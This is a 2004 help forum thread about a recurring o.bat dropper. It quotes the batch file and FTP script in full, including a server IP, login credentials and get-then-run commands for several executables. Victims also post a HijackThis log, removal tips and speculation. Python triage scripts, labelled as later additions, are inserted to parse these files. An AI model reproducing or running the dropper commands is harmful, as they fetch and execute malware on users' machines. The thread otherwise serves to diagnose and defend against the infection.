Author Topic: What are these??  (Read 8523 times)

Josh

  • Guest
What are these??
« on: September 27, 2004, 04:11:41 PM »
I keep getting "o.bat" on my desktop, it has:

if not exist C:\WINstatuslog ftp -s:o
if exist julie.exe julie.exe
if exist newdevin.exe newdevin.exe
if exist istinstall_154074.exe istinstall_154074.exe
if exist 06wu29rd.exe 06wu29rd.exe
if exist sd.exe sd.exe
if exist 449166.exe 449166.exe
if exist dp807615.exe dp807615.exe


I also have the file named "o" on my desktop, it has:


open 207.58.159.14
tmpacct
12345
bin
get julie.exe
get newdevin.exe
get istinstall_154074.exe
get 06wu29rd.exe
get sd.exe
get 449166.exe
get dp807615.exe
bye


   ftp://tmpacct:12345@207.58.159.14/
19 files in there, HOW do I stop this stupid [censored]? My AVs don't detect anything and I don't know what they are.
Anyone help me please, would be greatly appreciated.
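For anyone who finds the same pair of files and wants to know what they point at before touching them, here is a small Python triage script. It is an added example written for this thread, not something from the original posts: it reads an o.bat-style batch file and the ftp -s: script it replays, and pulls out the marker file the batch checks first, the FTP server and login, the files it fetches, and the ones the batch actually launches. The sample inputs are constructed to mirror the two files quoted above (with one extra "get" so the mismatch check has something to report); the function names are my own.

```python
"""Pull the indicators out of a scripted-FTP dropper pair (o.bat + o).
Added example; the sample inputs are constructed to mirror the thread."""
import re

# Constructed sample: the batch file, modelled on the o.bat quoted in the thread.
SAMPLE_BAT = """\
if not exist C:\\WINstatuslog ftp -s:o
if exist julie.exe julie.exe
if exist newdevin.exe newdevin.exe
if exist sd.exe sd.exe
"""

# Constructed sample: the ftp -s: script ("o"), with one extra get so the
# cross-check below has something to report.
SAMPLE_FTP_SCRIPT = """\
open 207.58.159.14
tmpacct
12345
bin
get julie.exe
get newdevin.exe
get sd.exe
get 449166.exe
bye
"""

# "if not exist <marker> ftp -s:<script>": the marker file is the dropper's own
# "already ran" check, the script is what ftp.exe will replay.
BAT_FTP_RE = re.compile(r"^if\s+not\s+exist\s+(\S+)\s+ftp(?:\.exe)?\s+-s:(\S+)", re.I)
# "if exist <file> <file>": launch each payload only if the download succeeded.
BAT_RUN_RE = re.compile(r"^if\s+exist\s+(\S+)\s+(\S+)\s*$", re.I)


def parse_dropper_bat(text):
    """Return the marker path, the ftp script name and the payloads the batch launches."""
    info = {"marker": None, "ftp_script": None, "executed": []}
    for raw in text.splitlines():
        line = raw.strip()
        m = BAT_FTP_RE.match(line)
        if m:
            info["marker"], info["ftp_script"] = m.group(1), m.group(2)
            continue
        m = BAT_RUN_RE.match(line)
        if m and m.group(1).lower() == m.group(2).lower():
            info["executed"].append(m.group(1))
    return info


def parse_ftp_script(text):
    """Walk an ftp -s: script the way ftp.exe reads it: 'open HOST' is followed by
    the username line and the password line, then ordinary ftp commands."""
    info = {"host": None, "user": None, "password": None,
            "binary": False, "downloads": []}
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    i = 0
    while i < len(lines):
        tokens = lines[i].split()
        cmd = tokens[0].lower()
        if cmd == "open" and len(tokens) > 1:
            info["host"] = tokens[1]
            if i + 1 < len(lines):
                info["user"] = lines[i + 1]
            if i + 2 < len(lines):
                info["password"] = lines[i + 2]
            i += 3
            continue
        if cmd in ("bin", "binary"):
            info["binary"] = True
        elif cmd in ("get", "recv", "mget") and len(tokens) > 1:
            info["downloads"].extend(tokens[1:])
        i += 1
    return info


def cross_check(bat_info, ftp_info):
    """Compare what the script downloads with what the batch runs; a mismatch
    points at payloads that were renamed, staged elsewhere or added later."""
    run = {f.lower() for f in bat_info["executed"]}
    got = {f.lower() for f in ftp_info["downloads"]}
    return {
        "downloaded_not_run": sorted(got - run),
        "run_not_downloaded": sorted(run - got),
    }


if __name__ == "__main__":
    bat = parse_dropper_bat(SAMPLE_BAT)
    ftp = parse_ftp_script(SAMPLE_FTP_SCRIPT)
    print("marker file checked first:", bat["marker"])
    print("ftp server:", ftp["host"], "user:", ftp["user"])
    print("payloads fetched:", ", ".join(ftp["downloads"]))
    print("mismatches:", cross_check(bat, ftp))
```

The server address, login and file names it prints are exactly what you would hand to your AV vendor, your ISP's abuse desk or the host's owner, and the marker path tells you which file the batch looks for before it does anything.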


guestolo

  • Guest
What are these??
« Reply #2 on: September 28, 2004, 10:48:41 PM »
Create a Permanent folder on your Hard Drive called HJT
EG...
C:\HJT
Download and save to that folder
Hijackthis

Do a SCAN----Scan will change to SAVE LOG----copy and paste the WHOLE contents of the log  here... Don't try and fix anything yet----It is all important

Guest

  • Guest
What are these??
« Reply #3 on: September 29, 2004, 07:04:09 AM »
I'm not downloading that. I have scanned my computer with AVG, The Cleaner, Adaware 6, Spybot, and Spy Sweeper. Nothing got rid of this.

Also, now I'm getting a command prompt "File not found." when I log into windows.

guestolo

  • Guest
What are these??
« Reply #4 on: September 29, 2004, 09:05:33 AM »
Well, I guess that is totally up to you
A lot of hijackthis logs posted on the Net every day
I've seen a couple entries that you posted that showed signs of Nasties

Ad-Aware, you're running an old version
The latest version is Ad-Aware SE Personal 1.05
Spybot, I gotta wonder what version you're running there, too

Hijackthis shows certain parts of the registry,
running processes, and active x controls---- that can help identify
what is running on your machine

Do yourself a favor and get the latest version of Ad-Aware
Also get the VX2 plugin for ad-aware and run it
This won't get you totally clean, but like you said
You're not downloading that!

Stay safe

Guest

  • Guest
What are these??
« Reply #5 on: September 29, 2004, 02:33:21 PM »
Thanks,  I installed the newest Ad-Aware and scanned, and removed everything.

guestolo

  • Guest
What are these??
« Reply #6 on: September 29, 2004, 10:17:39 PM »
Just to be safe you should make sure that you download
the VX2 plugin, if you didn't do it already for Ad-Aware
This link will show you how to download and install the Add-on
http://www.lavasoftusa.com/software/addons...x2cleaner.shtml

Let me know what it finds, if anything
I really wish you would post that hijackthis log, but I guess we'll have to hope your
system is actually clean

entivore

  • Guest
What are these??
« Reply #7 on: October 01, 2004, 12:06:59 AM »
I HIGHLY recommend Hijack This.  I had the most recent Adaware and spybot search and destroy and removed everything they found but my browser was still being hijacked by something.  But because Hijack this doesn't target specific known problems, instead things that MIGHT be problems based on how they affect your system, I was able to track down the problem.

It was able to find some aantx.dll file the others missed, and a quick google turned up no legit info on aantx.dll so I deleted it, and lo and behold, the problem's gone.  It is slightly dangerous however because it'll show all sorts of legit stuff and if you delete that you could mess up your system.

Wayne

  • Guest
What are these??
« Reply #8 on: October 04, 2004, 09:24:35 AM »
Josh, I'm curious if you visited the www.wunderground.com Web site for weather information back on 27 September.  I have seen the same files/software installed on my machine on two different occasions during the past week at that site.  I'm sure there are many other sites where the "attack" can be picked up as well.

My initial reaction was to uninstall (Add/Remove Programs) the newly installed programs.  But, during the uninstalls my entire list of installed programs (in Add/Remove Programs) went blank.  The machine would no longer boot up Windows.  It took nearly four hours to get my machine back to normal using a registry restore with my machine booted in Command-Mode (MSDOS).

This happened to me a second time this week after visiting the offending site again (my stupidity) - but I recovered this time in ten minutes using the registry restore.

I am interested in any explanation as to what IE permission actually allows the triggering of an install on my machine.  I am using a dial-up internet connection with IE6.

Guest

  • Guest
What are these??
« Reply #9 on: October 04, 2004, 04:36:48 PM »
I got these same files too and I hadn't visited the site you mentioned (see quote below).  However, I was also running IE6 with a dial-up connection.  I should also mention that since that happened (quite possibly a coincidence) my credit card information was stolen and used (with the card still in my wallet).  I am not sure how this person gained access to the card info but just in case it's related, be very wary of julie.exe et al.

Sarah

Quote
Josh, I'm curious if you visited the www.wunderground.com Web site for weather information back on 27 September. I have seen the same files/software installed on my machine on two different occasions during the past week at that site. I'm sure there are many other sites where the "attack" can be picked up as well.

Guest

  • Guest
What are these??
« Reply #10 on: October 05, 2004, 10:22:19 PM »
I, too, have dial up (msn) and IE6......and have been finding the o.bat and an o file on my desktop.  I have just deleted them each time they appear (at some point while online) until today.  Today I decided to see what was inside and found in the bat file:

FTP.exe
Julie.exe
newdevin.exe
IF01.exe
isinstall_154074.exe
sd.exe
sdmsg.exe
TVM_B5.exe
06wu29rd.exe
449166.exe
dp807615.exe

In the o file:

if exist open    207.58.159/14
if exist open    tmpacct
if exist open    12345
                      bin
                     get julie.exe
                     get newdevin
                     and it continued to list "get" and then each of the .exe's listed in the bat file.  

Our computer is a family computer with multiple users, therefore, it may be difficult to pinpoint from where we "caught" the bug.  At this point, I haven't had any other icons appear on the computer other than the two listed which tend to revisit my computer continually.  I have had my outlook express recently delete many of my folders and it was in total disarray.  Also, my "accessories" folder disappeared from my start menu not too long ago.  I have no idea if the two are in any way connected to this newest problem.  I have Windows 98 which is no longer supported and that makes it tougher to get resolution.

I use internet pay and am now concerned that my credit cards and other personal information could be stolen.  It is pathetic that others can hijack this information off of my computer when I don't even know where to find it myself!

Thanks for all the information.

David J.

  • Guest
What are these??
« Reply #11 on: October 06, 2004, 01:22:03 PM »
Oh my!! This problem is killing me!  It all started last week, and I'm having the same problems as everyone has mentioned.  But here's the thing with me.  I have the most up to date software I can find.  Ad-Aware, SpyBot, etc.  I'm also running NIS2004 and PC-cillin 2002.  NIS is great at stopping the programs from accessing the internet and PC-cillin quarantines most of the files.   Ad-Aware and Spybot get rid of most of the stuff.  But I usually have to do a lot of manual deletion in the registry and of files and folders that nothing will get rid of.  I get just about everything I can think of, but everything keeps coming back and I can't stop it from happening.   I've run HJT many times, but I just don't know if I'm missing something or what.  From what I've read, this problem gets on the computer by the method of FTP and just raises hell.  Last week, I got so frustrated I reloaded my computer because of it.  Now my computer is more secure than it was before, but even after the fresh reload everything just goes to crap again.  I'm not too familiar with HJT, so here's my log, but I've got rid of some stuff that I know.  With this log, I haven't gone through and deleted stuff yet, and I just ran Ad-Aware and Spybot and obviously there is still stuff there.

Logfile of HijackThis v1.98.2
Scan saved at 11:25:13 AM, on 10/6/2004
Platform: Windows XP  (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Norton Internet Security\NISUM.EXE
C:\Program Files\Norton Internet Security\ccPxySvc.exe
C:\WINDOWS\System32\inetsrv\inetinfo.exe
C:\Program Files\Norton SystemWorks\Norton Utilities\NPROTECT.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\PROGRA~1\NORTON~1\SPEEDD~1\nopdb.exe
C:\Program Files\Trend Micro\PC-cillin 2002\Tmntsrv.exe
C:\Program Files\Trend Micro\PC-cillin 2002\PCCPFW.exe
C:\WINDOWS\system32\winlogon.exe
C:\Program Files\Java\j2re1.4.2_05\bin\jusched.exe
C:\Program Files\Trend Micro\PC-cillin 2002\pccguide.exe
C:\Program Files\Trend Micro\PC-cillin 2002\PCCClient.exe
C:\Program Files\Trend Micro\PC-cillin 2002\Pop3trap.exe
C:\Program Files\MSI\Live Update 2\LMonitor.exe
C:\WINDOWS\System32\NVATray.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Trend Micro\PC-cillin 2002\WebTrap.EXE
C:\WINDOWS\System32\taskmgr.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\explorer.exe
C:\Program Files\Winamp\winamp.exe
C:\Program Files\NaviSearch\bin\nls.exe
C:\Program Files\BullsEye Network\bin\bargains.exe
C:\Program Files\CashBack\bin\cashback.exe
C:\Documents and Settings\David\Desktop\Programs for reloads\hijackthis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer,SearchURL = http://www.begin2search.com/sidesearch.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.begin2search.com/sidesearch.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.begin2search.com/sidesearch.html
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://fortress-of-solitude.mail.everyone....713724971960802
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.begin2search.com/sidesearch.html
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.begin2search.com/sidesearch.html
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R3 - URLSearchHook: (no name) - {E0DB1981-5BBF-D3C6-61B4-DA2888573D45} - C:\WINDOWS\Jricovqw.dll
O1 - Hosts file is located at: C:\WINDOWS\System32\drivers\etc\hosts
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {243B17DE-77C7-46BF-B94B-0B5F309A0E64} - C:\Program Files\Microsoft Money\System\mnyside.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: (no name) - {5C9C5BC0-9009-E5CF-2F7D-81985CF44FF2} - C:\WINDOWS\Jricovqw.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O2 - BHO: NLS UrlCatcher Class - {AEECBFDA-12FA-4881-BDCE-8C3E1CE4B344} - C:\WINDOWS\System32\nvms.dll
O2 - BHO: CB UrlCatcher Class - {CE188402-6EE7-4022-8868-AB25173A3E14} - C:\WINDOWS\System32\mscb.dll
O2 - BHO: ADP UrlCatcher Class - {F4E04583-354E-4076-BE7D-ED6A80FD66DA} - C:\WINDOWS\System32\msbe.dll
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - (no file)
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Search - {6C2BA9F2-3BBE-A287-318E-B8A59EF57AB1} - C:\WINDOWS\Jricovqw.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_05\bin\jusched.exe
O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\PC-cillin 2002\pccguide.exe"
O4 - HKLM\..\Run: [PCCClient.exe] "C:\Program Files\Trend Micro\PC-cillin 2002\PCCClient.exe"
O4 - HKLM\..\Run: [Pop3trap.exe] "C:\Program Files\Trend Micro\PC-cillin 2002\Pop3trap.exe"
O4 - HKLM\..\Run: [LiveMonitor] C:\Program Files\MSI\Live Update 2\LMonitor.exe
O4 - HKLM\..\Run: [NVIDIA nForce APU1 Utilities] NVATray.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [ccRegVfy] "C:\Program Files\Common Files\Symantec Shared\ccRegVfy.exe"
O4 - HKLM\..\Run: [LogonStudio] "C:\Program Files\WinCustomize\LogonStudio\logonstudio.exe" /RANDOM
O4 - HKLM\..\Run: [MSConfig] C:\WINDOWS\PCHealth\HelpCtr\Binaries\MSConfig.exe /auto
O4 - HKLM\..\Run: [CashBack] C:\Program Files\CashBack\bin\cashback.exe
O4 - HKLM\..\Run: [NaviSearch] C:\Program Files\NaviSearch\bin\nls.exe
O4 - HKLM\..\Run: [EbatesMoeMoneyMaker0] "C:\Program Files\Ebates_MoeMoneyMaker\EbatesMoeMoneyMaker0.exe"
O4 - HKLM\..\Run: [BullsEye Network] C:\Program Files\BullsEye Network\bin\bargains.exe
O4 - HKLM\..\RunOnce: [djebmm350.exe] "C:\DOCUME~1\David\LOCALS~1\Temp\djebmm350.exe"
O4 - HKLM\..\RunOnce: [AAW] "C:\Program Files\Lavasoft\Ad-Aware SE Personal\Ad-Aware.exe" "+b1"
O4 - HKCU\..\Run: [Symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe
O4 - HKCU\..\Run: [DealHelperDown] "C:\WINDOWS\Download.exe"
O8 - Extra context menu item: &Google Search - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: Backward Links - res://C:\Program Files\Google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://C:\Program Files\Google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Ebates - file://C:\Program Files\Ebates_MoeMoneyMaker\Sy350\Tp350\scri350a.htm
O8 - Extra context menu item: Similar Pages - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsimilar.html
O8 - Extra context menu item: Translate into English - res://C:\Program Files\Google\GoogleToolbar1.dll/cmtrans.html
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Your PC is infected with Spyware - click here to fix your PC - {FB74C951-ACA1-4e33-A94C-A9261EB2CCB7} - https://www.spydeleter.com/order2.php?KBID=1063 (file missing)
O9 - Extra button: Ebates - {6685509E-B47B-4f47-8E16-9A5F3A62F683} - file://C:\Program Files\Ebates_MoeMoneyMaker\Sy350\Tp350\scri350a.htm (HKCU)

Guest

  • Guest
What are these??
« Reply #12 on: October 06, 2004, 02:15:12 PM »
O2 - BHO: (no name) - {5C9C5BC0-9009-E5CF-2F7D-81985CF44FF2} - C:\WINDOWS\Jricovqw.dll
O2 - BHO: NLS UrlCatcher Class - {AEECBFDA-12FA-4881-BDCE-8C3E1CE4B344} - C:\WINDOWS\System32\nvms.dll
O2 - BHO: CB UrlCatcher Class - {CE188402-6EE7-4022-8868-AB25173A3E14} - C:\WINDOWS\System32\mscb.dll
O2 - BHO: ADP UrlCatcher Class - {F4E04583-354E-4076-BE7D-ED6A80FD66DA} - C:\WINDOWS\System32\msbe.dll
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - (no file)


These are VERY suspicious entries.  I'd delete all of these.

entivore

  • Guest
What are these??
« Reply #13 on: October 06, 2004, 02:15:29 PM »
that last guest was me btw

entivore

  • Guest
What are these??
« Reply #14 on: October 06, 2004, 02:16:53 PM »
R3 - URLSearchHook: (no name) - {E0DB1981-5BBF-D3C6-61B4-DA2888573D45} - C:\WINDOWS\Jricovqw.dll


delete that too, definitely.
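The entries entivore singles out share a few structural tells: "(no name)" where a real product would register a class name, "(no file)" for a BHO whose DLL is already gone, a DLL dropped directly into C:\WINDOWS rather than under Program Files or System32, and the same DLL registered under several hook types at once (BHO, toolbar and URLSearchHook all pointing at Jricovqw.dll). Here is an added Python script, not part of the thread or of HijackThis itself, that applies just those heuristics to the O2/O3/R3 lines of a log so they surface automatically. The sample log lines are constructed to mirror the one posted above, and the rule names are my own; an entry that passes these checks (nvms.dll in System32, for instance) is not thereby cleared, so each file still needs to be looked up.

```python
"""Triage the browser-hook lines of a HijackThis-style log (O2 BHOs, O3 toolbars,
R3 URLSearchHooks). Added example using structural heuristics only; it does not
replace checking each file by name."""
import re
from collections import defaultdict

# Constructed sample lines, modelled on the log posted in this thread.
SAMPLE_LOG = """\
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\\Program Files\\Adobe\\Acrobat 6.0\\Reader\\ActiveX\\AcroIEHelper.dll
O2 - BHO: (no name) - {5C9C5BC0-9009-E5CF-2F7D-81985CF44FF2} - C:\\WINDOWS\\Jricovqw.dll
O2 - BHO: NLS UrlCatcher Class - {AEECBFDA-12FA-4881-BDCE-8C3E1CE4B344} - C:\\WINDOWS\\System32\\nvms.dll
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - (no file)
O3 - Toolbar: Search - {6C2BA9F2-3BBE-A287-318E-B8A59EF57AB1} - C:\\WINDOWS\\Jricovqw.dll
R3 - URLSearchHook: (no name) - {E0DB1981-5BBF-D3C6-61B4-DA2888573D45} - C:\\WINDOWS\\Jricovqw.dll
O4 - HKLM\\..\\Run: [ccApp] "C:\\Program Files\\Common Files\\Symantec Shared\\ccApp.exe"
"""

# "<type>: <name> - {CLSID} - <path>" for the three browser-hook entry types.
ENTRY_RE = re.compile(
    r"^(O2 - BHO|O3 - Toolbar|R3 - URLSearchHook):\s*(.*?)\s*-\s*\{([0-9A-Fa-f-]{36})\}\s*-\s*(.*)$")
# A DLL sitting directly in the Windows directory (no subfolder such as System32).
LOOSE_WINDIR_DLL_RE = re.compile(r"^[A-Za-z]:\\WINDOWS\\[^\\]+\.dll$", re.I)


def parse_entries(log_text):
    """Return the O2/O3/R3 entries as dicts; other line types are ignored."""
    entries = []
    for line in log_text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            entries.append({"type": m.group(1), "name": m.group(2),
                            "clsid": m.group(3).upper(), "path": m.group(4).strip()})
    return entries


def triage(log_text):
    """Return only the entries that trip at least one heuristic, each with its reasons."""
    entries = parse_entries(log_text)
    # Which hook types point at the same on-disk DLL?
    types_by_path = defaultdict(set)
    for e in entries:
        if e["path"] != "(no file)":
            types_by_path[e["path"].lower()].add(e["type"])

    flagged = []
    for e in entries:
        reasons = []
        if e["name"] == "(no name)":
            reasons.append("no name")
        if e["path"] == "(no file)":
            reasons.append("no file")
        elif LOOSE_WINDIR_DLL_RE.match(e["path"]):
            reasons.append("DLL sits directly in the Windows directory")
        hook_types = types_by_path.get(e["path"].lower(), set())
        if len(hook_types) >= 2:
            reasons.append("same DLL registered as %d different hook types" % len(hook_types))
        if reasons:
            flagged.append({**e, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print("%s  %s  %s" % (hit["type"], hit["path"], "; ".join(hit["reasons"])))
```

Run against the sample, it flags the three Jricovqw.dll registrations and the "(no file)" BHO and leaves the Acrobat helper alone, which matches the calls made in the replies above.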

Guest_Sarah

  • Guest
What are these??
« Reply #15 on: October 06, 2004, 04:22:11 PM »
Quote
O9 - Extra button: Your PC is infected with Spyware - click here to fix your PC - {FB74C951-ACA1-4e33-A94C-A9261EB2CCB7} - https://www.spydeleter.com/order2.php?KBID=1063 (file missing)

Yes, I forgot to mention, I had "spy deleter" as well, before I had Julie.exe et al.  And BTW, please don't panic.  My credit card could have easily been duplicated.  This is happening more and more by people who make fake duplicates of cards and use them in stores.  The purchases were made using a live card (i.e., in a retail store) not just an account number.  So I don't really think julie.exe et al. took my financial data, but just be careful until you know what they are.
Also--how I got rid of the programs is that I have the program "Window Washer" (Webroot Software).  I used it to "shred" the unwanted program files rather than just delete them.  Not sure what the difference is, but so far, they haven't come back.  Also, make sure your windows software is updated so your system isn't vulnerable.
Sarah

Guest

  • Guest
What are these??
« Reply #16 on: October 06, 2004, 04:53:57 PM »
Quote from: Wayne on Oct 4 2004, 08:24 AM
Josh, I'm curious if you visited the www.wunderground.com Web site for weather information back on 27 September.  I have seen the same files/software installed on my machine on two different occasions during the past week at that site.  I'm sure there are many other sites where the "attack" can be picked up as well.

My initial reaction was to uninstall (Add/Remove Programs) the newly installed programs.  But, during the uninstalls my entire list of installed programs (in Add/Remove Programs) went blank.  The machine would no longer boot up Windows.  It took nearly four hours to get my machine back to normal using a registry restore with my machine booted in Command-Mode (MSDOS).

This happened to me a second time this week after visiting the offending site again (my stupidity) - but I recovered this time in ten minutes using the registry restore.

I am interested in any explanation as to what IE permission actually allows the triggering of an install on my machine.  I am using a dial-up internet connection with IE6.

I haven't gone to the website, I do not look for weather information online. I'm thinking about just installing a different OS, since I have Windows ME (big resource problems)

Josh

  • Guest
What are these??
« Reply #17 on: October 06, 2004, 05:00:33 PM »
Also, I should include, I still do get the o.bat file and things on desktop, and I think it's whenever "WUAUBOOT" is executed.

C:\Win\WUAUBOOT.exe

Every time, before I get the o.bat file, WUAUBOOT.exe is opened. I close it once it is opened so it doesn't download the other crap if that's what the bat file does.
I use Internet Explorer 5.50.4134.0100.

Thanks for everyone's help, and good luck to everyone with the same problem, and for the person who owns that FTP,  you are pathetic.

Guest

  • Guest
What are these??
« Reply #18 on: October 08, 2004, 01:11:32 PM »
The IP to that @#$! site is 207.58.159.14 so it shouldn't be too difficult to track down the owner right?  Even if it has been hijacked by someone else it could then be shut down.

ZAPGOD

  • Guest
What are these??
« Reply #19 on: October 08, 2004, 06:11:37 PM »
The file O.bat launches the FTP session to the contents of the file "O" if the file C:\WINDOWSstatuslog  does not exist.
If you place a blank file in the C:\  and name it WINDOWSstatuslog  (no extension) then it should keep the spyware and adware applications from downloading and installing.

Now, on another note how are O and O.bat getting on the system to begin with and what triggers O.bat??  

If you have a freshly infected system please post a text file of your internet history for the day that you were infected.  

I believe that there is an exploit in IE that is being used to install the initial hooks.

Also post what Operating system you were using, antivirus and definition files and windows patches have been installed.